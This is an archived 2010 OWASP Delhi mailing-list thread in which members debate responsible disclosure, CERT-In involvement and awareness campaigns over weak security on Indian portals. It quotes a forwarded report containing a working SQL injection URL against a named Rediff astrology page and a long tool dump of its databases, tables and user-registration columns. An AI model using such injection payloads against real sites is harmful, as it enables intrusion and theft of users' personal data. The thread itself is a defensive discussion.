[Owasp-delhi] Rediff Astrology

Sripathi Krishnan sripathi.krishnan at gmail.com
Wed Jun 16 08:30:29 EDT 2010


There is a problem with reporting vulnerabilities - every website has
hundreds of them spread all over. Reporting all of them requires a herculean
effort, and without a buy-in from the top management of the website, its not
going to get fixed. Our collective interest will definitely fade if we don't
see some action from the developers.

The state our websites our in, we need action from higher management. If
they don't support the initiative, there is just no way that individual
teams/developers will fix hundreds of web pages. I strongly believe we need
to influence the management to take an active interest in application
security.

So, instead of vulnerability database, I propose organizing training
sessions for website owners/developers. Perhaps an India wide OWASP meet,
with the stated goal of 'Increasing corporate awareness towards Application
Security'. We can perhaps have a two day seminar, with sessions for business
folks as well as for developers and testers.

Getting sponsors should not be an issue. This also falls well within the
purview of OWASP, so we won't have any legal/political issues. We can use
our individual contacts to make sure most Indian portal owners are aware of
this seminar and have adequate representation. And we can find a lot of
people from this group to help out with the training material, seminars,
presentations and such.

I think that is the best use of the people in this group. Another database
of vulnerabilities is not going to take us too far IMHO.

--Sri


On 16 June 2010 15:16, Soi, Dhruv <dhruv.soi at torridnetworks.com> wrote:

>  That sounds like government supportive lang., seems you have had a good
> time with them J No offensive though, I like that.
>
>
>
> I could better think of collective idea from Subhash’s and Sriram’s post to
> have a central portal dedicated towards web application breaches and flaws
> in India, just like WASC (which is for global). The count of vulnerabilities
> that WASC could build over 10 years for global websites, I am sure, we can
> build similar database for Indian web applications in around 1yr itself J
>
>
>
> We could think of a model where a vuln. is firstly reported to the owner
> and CERT-IN to show our responsibility for the provider. Thereafter, give
> some time window to fix the problem. If nothing happens in the window and/or
> there is no response from the owner, we show our responsibility for the
> consumer and publish it over the portal.
>
>
>
> We can further brainstorm keeping CERT-IN in loop to drive something
> fruitful. Connect me offline if anyone of you is interested to mature this
> idea, we can catch up somewhere in NCR, pitch this idea as an OWASP India
> Project, participate as volunteers, and do something good for owner,
> consumers and govt.
>
>
>
> Cheers!
>
> Dhruv
>
>
>
> *From:* Subhash Dutta [mailto:subhash.dutta at kriss.in]
> *Sent:* 16 June 2010 14:43
> *To:* Sriram Lakshmanan
>
> *Cc:* owasp-delhi
> *Subject:* Re: [Owasp-delhi] Rediff Astrology
>
>
>
> I agree with this proposal.  My further suggestions:-
>
>  (a)  Involve CERT-In fully.  This will take care of the legal hassles as
> it is their mandate.
>  (b)  Follow some thing like responsible disclosure.  Sending vulnerability
> information through a central point of contact (preferably at CERT-In).
>
> Regards
>
> Subhash Dutta
>
>
> ----- Original Message -----
> From: "Sriram Lakshmanan" <sriram_lakshmanan at uhc.com>
> To: "dhruv soi" <dhruv.soi at owasp.org>, "Subhash Dutta" <
> subhash.dutta at kriss.in>, "Sripathi Krishnan" <sripathi.krishnan at gmail.com>
> Cc: "owasp-delhi" <owasp-delhi at lists.owasp.org>
> Sent: Wednesday, June 16, 2010 1:51:28 PM GMT +05:30 Chennai, Kolkata,
> Mumbai, New Delhi
> Subject: RE: [Owasp-delhi] Rediff Astrology
>
>
>  I don't know if it can happen under the ageis of OWASP or not but maybe
> we need something like a Jagorey campaign and a "fall of shame". I'm banking
> on this group's collective wisdom to do something...
>
>    - The Jagorey like campaign is for the CxO forums who are often unware
>    of the problem in their own backyard as the tech manager never notified them
>    or didn't give them enough gyan (specially to CTO/CISO). Maybe leverage
>    NASSCOM for such forums (for contact points)
>    - The fall of shame is for sites we identity as "bad" weak thru
>    non-intriusive testing and advise the public about the risks of the weakness
>    exists even after notification to the company. I understand such a list
>    opens up more hacks/attacks, and thus we can refrain from displaying the
>    vulnerable url and details on the attack. CERT-in may be leveraged for this.
>    I also do not know the complete legal interpretation of such a move (which
>    may include defamation suits)
>
> The point I'm trying to make is we know we have issues, with corporate
> indfifference to security, with laws that are not enforced well, with
> "security people" just doing what I call "khanapoorti" i.e action for the
> sake of it. The problems will not go away. As a responsibile community can
> we create a task force and collectively do something?. I do understand the
> individual efforts like Nilesh's / Sripathi's or Subhash's and others have
> fallen on deaf ears and is frustrating....maybe concerted and joint efforts
> will bear fruits.
>
>
>
> Additional thoughts/comments/feedback...
>
>
>
>  PS: I use Jagorey like as refernce, as Jagorey campaign is a TV advt
> showing a movement against corruption.
>
>
>
> warm regards,
>
> Sriram
>
> *SEC**_**R**_**TY. **U** &* *I** *are in it together. Everyone’s
> responsible - Everywhere
>
>
>
>
>  ------------------------------
>
> *From:* owasp-delhi-bounces at lists.owasp.org [mailto:
> owasp-delhi-bounces at lists.owasp.org] *On Behalf Of *Soi, Dhruv
> *Sent:* Wednesday, June 16, 2010 12:44 PM
> *To:* 'Subhash Dutta'; 'Sripathi Krishnan'
> *Cc:* 'owasp-delhi'
> *Subject:* Re: [Owasp-delhi] Rediff Astrology
>
> Old saying and a song – “It happens only in India”. Till the time laws
> aren’t enforced with a force, no one is bothered about security. Even laws
> can be bypassed here, but atleast few would be trapped to set the example
> for others.
>
>
>
> When I explain India InfoSec to the friends abroad, I generally blame the
> Indian mindset. Bike Riders here don’t care about their personal security
> and wear helmets only when there is strict police checking. Same is with the
> car drivers for their seat belts. In Delhi, we find better police checking
> so people are serious, but in other areas like Noida, no one cares. In a
> nutshell, only strict laws can help Corporate India to be secure and deliver
> secure.
>
>
>
>
>
> *From:* owasp-delhi-bounces at lists.owasp.org [mailto:
> owasp-delhi-bounces at lists.owasp.org] *On Behalf Of *Subhash Dutta
> *Sent:* 16 June 2010 09:09
> *To:* Sripathi Krishnan
> *Cc:* owasp-delhi
> *Subject:* Re: [Owasp-delhi] Rediff Astrology
>
>
>
> Yes I have also noted the same. In fact, the imint card company stores
> passwords as reversible encrypted and will tell you in plain text what your
> password is in case you have forgotten it ;).  When brought to their notice,
> I received a standard reply - Thanking for contacting us, we will get back
> to you shortly.  Nobody has got back till date (1 year past).  I think
> strong legislative punitive measures are the only solution.
>
> Regards
>
> Subhash Dutta
>
>
> ----- Original Message -----
> From: "Sripathi Krishnan" <sripathi.krishnan at gmail.com>
> To: "dhruv soi" <dhruv.soi at owasp.org>
> Cc: owasp-delhi at lists.owasp.org, owasp-mumbai at lists.owasp.org,
> owasp-bangalore at lists.owasp.org
> Sent: Monday, June 14, 2010 11:25:23 PM GMT +05:30 Chennai, Kolkata,
> Mumbai, New Delhi
> Subject: Re: [Owasp-delhi] Rediff Astrology
>
> Its not just rediff.com, almost all other Indian portals - in.com,
> indiatimes.com and sify.com have similar problems. XSS, XSRF, SQL
> Injection, Poor password/session management, open redirects .. the list is
> endless.
>
>
>
> I have written to each of the above portals several times in the past year,
> and have given up. IMHO, they are not interested in securing their websites.
>
>
>
> --Sri
>
> On 14 June 2010 23:17, Soi, Dhruv <dhruv.soi at owasp.org> wrote:
>
> Another one to notify Rediff that readers’ daily fortune can be fixed by
> someone…Seems Rediff needs a lot of OWASP, do inform them that its free!!
>
>
>
> *From:* “Jack H4xor”
> *Sent:* 14 June 2010 12:07
> *To:* dhruv.soi at owasp.org
> *Subject:* Rediff Astrology
>
>
>
> y0,
>
>
> h0rr1bl3 th4n h0rr0r
>
> Vulnerable Url :
>
>
> http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Scorpiox%27%20OR%201=convert%28int,@@version%29--
>
>
>
> ********************************************************************
>
>
>
> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>
>
>
>
>
>
>
>
>
>
>
> +     -==  MSSQL Information Schema astrology.rediff.com  ==-     +
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>
>
>
>
>
>
>
>
>
>
>
> [ + ] URL : http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzo
>
>
>
>
>
>
>
>
>
>
>
>
> diac=Scorpiox'
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Date: Tue May 18 20:58:26 2010
>
>
>
> [ + ] Displaying information about MSSQL host !
>
>
>
>
>
>
>
> [ + ] @@VERSION  :      Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
>
>
>
>
>
>
>
>                         Aug  6 2000 00:57:48
>
>
>
>                         Copyright (c) 1988-2000 Microsoft Corporation
>
>
>
>                         Standard Edition on Windows NT 5.0 (Build 2195: Service
>
>
>
> Pack 4)
>
>
>
>
>
>
>
> [ + ] USER ()          : dbo
>
>
>
>
>
>
>
> [ + ] S_USER ()        : astrology
>
>
>
> [ + ] DB_NAME ()       : astro
>
>
>
> [ + ] HOST_NAME ()     : ASTROLOGY
>
>
>
> [ + ] SERVER_NAME ()   : SEARCHDB
>
>
>
> [ + ] SERVER_TYPE ()   : Microsoft-IIS/6.0
>
>
>
> [ + ] X-POWERED-By ()  : ASP.NET
>
>
>
>
>
>
>
> [ + ] IP_ADDRESS_INFO  : 202.54.124.173
>
>
>
>
>
>
>
>
>
>
>
> [ - ] We Can't get number of Databases !
>
>
>
>
>
>
>
>
>
>
>
> [ ! ] Start dumping database Names !
>
>
>
>
>
>
>
> [ ? ] But first choice number of DB to dump :> 20
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Displaying list of 20 databases on this MSSQL host !
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 0 ]        : astro
>
>
>
>
>
>
>
> [ DATABASE: 1 ]        : master
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 2 ]        : tempdb
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 3 ]        : model
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 4 ]        : msdb
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 5 ]        : pubs
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 6 ]        : Northwind
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 7 ]        : travel
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 8 ]        : travel_int
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 9 ]        : astro
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 10 ]        : Jobsearch
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 11 ]        : astroyogiD
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 12 ]        : matrimonial
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 13 ]        : investornew
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 14 ]        : test
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ ! ] Vulnerability Database is   :  astro
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Displaying Tables inside DB :> astro
>
>
>
>
>
>
>
>
>
>
>
> [ ? ] Numbers of Tables To Dispaly ?
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Specify Numbers   :> 200
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 0 ]          : ALLIANCE_PARTNER_COMMISSION
>
>
>
>
>
>
>
> [ TABLES: 1 ]          : ALLIANCE_PARTNER_MASTER
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 2 ]          : astrolove
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 3 ]          : astroparent
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 4 ]          : CITY
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 5 ]          : COMPLETE_ORDER_DETAIL
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 6 ]          : COMPLETE_SUBSCRIPTION_DETAIL
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 7 ]          : COUNTRY
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 8 ]          : CUSTOMER_CARE_DETAILS
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 9 ]          : CUSTOMER_CARE_MASTER
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 10 ]          : CUSTOMER_PERSON1
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 11 ]          : CUSTOMER_PERSON2
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 12 ]          : CUSTOMER_PERSON3
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 13 ]          : darshtest
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 14 ]          : dtproperties
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 15 ]          : FENGSHUI
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 16 ]          : FRANCHISEE_MASTER
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 17 ]          : idealmate
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 18 ]          : INTERNATIONAL_PARTNER_MASTER
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 19 ]          : NUMEROLOGY
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 20 ]          : ORDER_DETAILS
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 21 ]          : ORDER_MASTER
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 22 ]          : ORDER_REMARKS
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 23 ]          : ORDERS
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 24 ]          : p1
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 25 ]          : p3master
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 26 ]          : PALMISTRY
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 27 ]          : PAYMENT_METHOD_MASTER
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 28 ]          : PROBLEM_ANSWER
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 29 ]          : PROBLEM_CATEGORY
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 30 ]          : REGISTRATION
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 31 ]          : SHIPPING_DETAILS
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 32 ]          : SPCFIC_ANLYS
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 33 ]          : SUBSCRIBER_DETAILS
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 34 ]          : SUBSCRIBER_MASTER
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 35 ]          : SUBSCRIBER_REGISTRATION
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 36 ]          : SUBSCRIBER_TRANSACTION
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 37 ]          : SUBSCRIPTION_DETAILS
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 38 ]          : SUBSCRIPTION_MASTER
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 39 ]          : sysconstraints
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 40 ]          : syssegments
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 41 ]          : test
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 42 ]          : USER_ASTROLOGER_PRODUCT_TRANSACTION
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 43 ]          : zodiac
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Done !
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Start dumping all Columns from table :> REGISTRATION
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ ? ] Numbers of Columns To Display ?
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Specify Numbers    :> 50
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Displaying 50 Columns inside Table: REGISTRATION and Database: astro
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 0 ]         : FRANCHISEE_ID
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 1 ]         : PARTNER_ID
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 2 ]         : REGISTRATION_ADDRESS
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 3 ]         : REGISTRATION_BIRTH_COUNTRY
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 4 ]         : REGISTRATION_BIRTH_DATE
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 5 ]         : REGISTRATION_BIRTH_PLACE
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 6 ]         : REGISTRATION_BIRTH_TIME_HOUR
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 7 ]         : REGISTRATION_BIRTH_TIME_MINUTES
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 8 ]         : REGISTRATION_CELL_NO
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 9 ]         : REGISTRATION_COUNTRY
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 10 ]         : REGISTRATION_DATE
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 11 ]         : REGISTRATION_EMAIL_ID
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 12 ]         : REGISTRATION_FIRSTNAME
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 13 ]         : REGISTRATION_GENDER
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 14 ]         : REGISTRATION_ID
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 15 ]         : REGISTRATION_IP
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 16 ]         : REGISTRATION_LASTNAME
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 17 ]         : REGISTRATION_PASSWORD
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 18 ]         : REGISTRATION_TELEPHONE_NO
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 19 ]         : REGISTRATION_USERNAME
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ ! ] Done !
>
>
>
>
>
>
>
>
>
>
>
> [ ! ] All information was recorded in astrology.rediff.com.txt file !
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ 1 ] : Return to Tables  !
>
>
>
>
>
>
>
> [ 2 ] : Return to Columns !
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ ? ] : Oprion :>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> Thanks & Regards
>
>
>
> Jackh4xor
>
>
>
> ( h4cky0u )
>
>
> _______________________________________________
> Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
>
>
>
> _______________________________________________ Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
>
>
> This e-mail, including attachments, may include confidential and/or
>
> proprietary information, and may be used only by the person or entity
>
> to which it is addressed. If the reader of this e-mail is not the intended
>
> recipient or his or her authorized agent, the reader is hereby notified
>
> that any dissemination, distribution or copying of this e-mail is
>
> prohibited. If you have received this e-mail in error, please notify the
>
> sender by replying to this message and delete this e-mail immediately.
>
>
> _______________________________________________
> Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-delhi/attachments/20100616/2babd573/attachment-0001.html 


More information about the Owasp-delhi mailing list